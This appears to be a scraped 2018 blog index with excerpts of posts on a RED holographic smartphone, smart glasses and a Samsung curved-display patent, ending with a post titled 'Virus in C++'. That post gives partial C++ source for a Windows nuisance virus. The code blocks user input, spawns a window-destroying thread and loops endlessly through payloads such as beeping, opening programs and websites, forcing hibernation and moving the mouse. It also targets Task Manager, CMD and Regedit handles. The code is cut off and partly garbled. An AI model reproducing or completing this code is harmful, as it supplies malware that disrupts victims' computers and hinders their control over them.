Posts

Showing posts from 2018

NEW COOLEST TECHNOLOGY...

Image
THE RED SMART PHONE In 2017, the cinema camera making company RED announced it was working a  smartphone with a "holographic screen."  Consumers were unsure what this meant until September 2017. Essentially, the phone would provide a 3D viewing experience on screen, projecting things like buildings and landscapes in an interactive map. A user could essentially take a virtual tour via the phone screen, looking around, above, behind, or in-between various objects.  The RED smart phone is currently available for pre-order, for the fairly hefty price tag of $1,195. No official release date has been announced, but the company says users can expect to see the product sometime in 2018.  SMART GLASSES Smart glasses are far from a new invention. The glasses, which project information onto your retina as you go about your day, once came with clunky equipment attached. Cameras, extra appendages, and microphones made the glasses a bit of an eyesore that easily led to u

Samsung's New Technology

Image
New Samsung Patent Shows a Fully Curved Galaxy Smartphone In 2013, Samsung released its first smartphone with a flexible AMOLED display: The  Galaxy Round . A year later, the  Galaxy Note Edge  hit the market with a curved display. The Galaxy Round and the Note Edge had limited availability, and it took 2015’s  Galaxy S6 Edge  to make curved displays really popular. It’s telling that Samsung doesn’t sell a mainstream flagship smartphone with a flat display anymore. And if a new patent is any indication, it’s not stopping at displays — its next phone might fold around itself. Following on the heels of Samsung’s patent for a foldable phone user interface ,  LetsGoDigital  found a series of new patents in the WIPO (World International Property Office) database for a device with a curved display on both sides. It doesn’t merely have a curved-edge display — instead, the proposed smartphone has a 180-degree curved display that curves all the way to the rear. In the patent, Samsung sa

Virus in C++

Use iostream.h,conio.h,ctime.h, windows.h,winable.h int random, Freq, Dura, X, Y;//Integers are declared HWND mywindow, TaskMgr, CMD, Regedit; //This is used to catch-up memory charNotepad[MAX_PATH]="notepad.exe";//character is declared to open notepad char MineSweeper[MAX_PATH]="winmine.exe";//character is declared to open winrar file char Website[MAX_PATH]="http:\\www.google.com";//character is declared to open the website void SetUp(); void Run( int ID ); void Beeper(), OpenStuff(), Hibernation(), CrazyMouse(); //Function are declared DWORD WINAPI DestroyWindows(LPVOID); int main() { srand( time(0) ); random = rand()%6; system("title :.Virus.:"); BlockInput( true ); SetUp(); BlockInput( false ); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL); while(1) { Run( random ); Sleep(10); } }//Main function void SetUp() { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL);